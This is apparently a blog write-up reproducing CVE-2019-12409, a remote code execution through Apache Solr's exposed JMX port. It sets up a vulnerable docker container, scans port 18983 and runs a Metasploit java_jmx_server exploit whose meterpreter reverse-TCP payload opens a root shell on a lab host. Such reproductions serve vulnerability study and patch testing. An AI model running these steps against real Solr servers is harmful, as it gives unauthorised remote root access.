Apache Solr JMX Service RCE CVE-2019-12409
Apache Solr JMX Service RCE CVE-2019-12409
Apache Solr JMX Service RCE CVE-2019-12409
Vulnerability Description
Java ManagementExtensions (JMX) is a Java technology that provides corresponding tools for managing and monitoring applications, system objects, devices (such as printers), and service-oriented networks.
Affect Version
Apache Solr 8.1.1 Apache Solr 8.2.0
Environment construction
1
2
docker pull solr:8.2.0
docker run --name solr -d -p 8983:8983 -t solr:8.2.0
Vulnerability reappears
Check whether the vulnerability port 18983 is open
1
nmap xxx.xxx.xxx.xxx -p 18983
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
root@kali:~/桌面# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Writing a custom module? After editing your module, why not try the reload command
msf5 > use exploit/multi/misc/java_jmx_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_jmx_server) > set rhost 192.168.51.146
rhost => 192.168.51.146
msf5 exploit(multi/misc/java_jmx_server) > set rport 18983
rport => 18983
msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_jmx_server) > options
Module options (exploit/multi/misc/java_jmx_server):
Name Current Setting Required Description
---- --------------- -------- -----------
JMXRMI jmxrmi yes The name where the JMX RMI interface is bound
JMX_PASSWORD no The password to interact with an authenticated JMX endpoint
JMX_ROLE no The role to interact with an authenticated JMX endpoint
RHOSTS 192.168.51.146 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 18983 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.51.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf5 exploit(multi/misc/java_jmx_server) > run
[*] Started reverse TCP handler on 192.168.51.149:4444
[*] 192.168.51.146:18983 - Using URL: https://0.0.0.0:8080/xln8izoCtDUbBVm
[*] 192.168.51.146:18983 - Local IP: https://192.168.51.149:8080/xln8izoCtDUbBVm
[*] 192.168.51.146:18983 - Sending RMI Header...
[*] 192.168.51.146:18983 - Discovering the JMXRMI endpoint...
[+] 192.168.51.146:18983 - JMXRMI endpoint on 127.0.1.1:18983
[*] 192.168.51.146:18983 - Proceeding with handshake...
[+] 192.168.51.146:18983 - Handshake with JMX MBean server on 127.0.1.1:18983
[*] 192.168.51.146:18983 - Loading payload...
[*] 192.168.51.146:18983 - Replied to request for mlet
[*] 192.168.51.146:18983 - Replied to request for payload JAR
[*] 192.168.51.146:18983 - Executing payload...
[*] 192.168.51.146:18983 - Replied to request for payload JAR
[*] Sending stage (53944 bytes) to 192.168.51.146
[*] Meterpreter session 1 opened (192.168.51.149:4444 -> 192.168.51.146:56234) at 2020-11-05 14:17:04 +0800
meterpreter >
meterpreter > shell
Process 1 created.
Channel 1 created.
id
用户id=0(root) 组id=0(root) 组=0(root)
This post is licensed under CC BY 4.0 by the author.